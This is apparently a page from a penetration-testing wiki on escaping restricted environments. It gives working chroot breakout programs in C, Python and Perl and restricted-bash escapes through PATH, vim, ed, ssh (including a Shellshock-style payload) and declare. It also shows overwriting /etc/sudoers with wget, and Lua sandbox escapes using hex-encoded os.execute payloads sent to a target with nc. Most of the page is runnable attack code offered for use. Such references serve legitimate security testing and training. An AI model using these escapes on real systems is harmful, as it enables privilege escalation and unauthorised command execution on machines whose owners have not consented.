Escaping from Jails

Support HackTricks and get benefits!
GTFOBins
Search in https://gtfobins.github.io/ if you can execute any binary with "Shell" property
Chroot limitation
From wikipedia: The chroot mechanism is not intended to defend against intentional tampering by privileged (root) users. On most systems, chroot contexts do not stack properly and chrooted programs with sufficient privileges may perform a second chroot to break out.
Therefore, if you are root inside a chroot you can escape creating another chroot. However, in several cases inside the first chroot you won't be able to execute the chroot command, therefore you will need to compile a binary like the following one and run it:
break_chroot.c
1
#include <sys/stat.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4
​
5
//gcc break_chroot.c -o break_chroot
6
​
7
int main(void)
8
{
9
    mkdir("chroot-dir", 0755);
10
    chroot("chroot-dir");
11
    for(int i = 0; i < 1000; i++) {
12
        chdir("..");
13
    }
14
    chroot(".");
15
    system("/bin/bash");
16
}
Copied!
Using python:
1
#!/usr/bin/python
2
import os
3
os.mkdir("chroot-dir")
4
os.chroot("chroot-dir")
5
for i in range(1000):
6
    os.chdir("..")
7
os.chroot(".")
8
os.system("/bin/bash")
Copied!
Using perl:
1
#!/usr/bin/perl
2
mkdir "chroot-dir";
3
chroot "chroot-dir";
4
foreach my $i (0..1000) {
5
    chdir ".."
6
}
7
chroot ".";
8
system("/bin/bash");
Copied!
Bash Jails
Enumeration
Get info about the jail:
1
echo $SHELL
2
echo $PATH
3
env
4
export
5
pwd
Copied!
Modify PATH
Check if you can modify the PATH env variable
1
echo $PATH #See the path of the executables that you can use
2
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path
3
echo /home/* #List directory
Copied!
Using vim
1
:set shell=/bin/sh
2
:shell
Copied!
Create script
Check if you can create an executable file with /bin/bash as content
1
red /bin/bash
2
> w wx/path #Write /bin/bash in a writable and executable path
Copied!
Get bash from SSH
If you are accessing via ssh you can use this trick to execute a bash shell:
1
ssh -t [email protected]<IP> bash # Get directly an interactive shell
2
ssh [email protected]<IP> -t "bash --noprofile -i"
3
ssh [email protected]<IP> -t "() { :; }; sh -i "
Copied!
Declare
1
declare -n PATH; export PATH=/bin;bash -i
2
 
3
BASH_CMDS[shell]=/bin/bash;shell -i
Copied!
Wget
You can overwrite for example sudoers file
1
wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
Copied!
Other tricks
​https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
https://pen-testing.sans.org/blog/2012/0b6/06/escaping-restricted-linux-shells
https://gtfobins.github.io
It could also be interesting the page:
Bypass Linux Shell Restrictions
Python Jails
Tricks about escaping from python jails in the following page:
Bypass Python sandboxes
Lua Jails
In this page you can find the global functions you have access to inside lua: https://www.gammon.com.au/scripts/doc.php?general=lua_base​
Eval with command execution**:**
1
load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))()
Copied!
Some tricks to call functions of a library without using dots:
1
print(string.char(0x41, 0x42))
2
print(rawget(string, "char")(0x41, 0x42))
Copied!
Enumerate functions of a library:
1
for k,v in pairs(string) do print(k,v) end
Copied!
Note that every time you execute the previous one liner in a different lua environment the order of the functions change. Therefore if you need to execute one specific function you can perform a brute force attack loading different lua environments and calling the first function of le library:
1
#In this scenario you could BF the victim that is generating a new lua environment 
2
#for every interaction with the following line and when you are lucky
3
#the char function is going to be executed
4
for k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end
5
​
6
#This attack from a CTF can be used to try to chain the function execute from "os" library
7
#and "char" from string library, and the use both to execute a command
8
for i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done
Copied!
Get interactive lua shell: If you are inside a limited lua shell you can get a new lua shell (and hopefully unlimited) calling:
1
debug.debug()
Copied!
Support HackTricks and get benefits!

euid, ruid, suid

Cisco - vmanage

Last modified 2mo ago

Copy link

Contents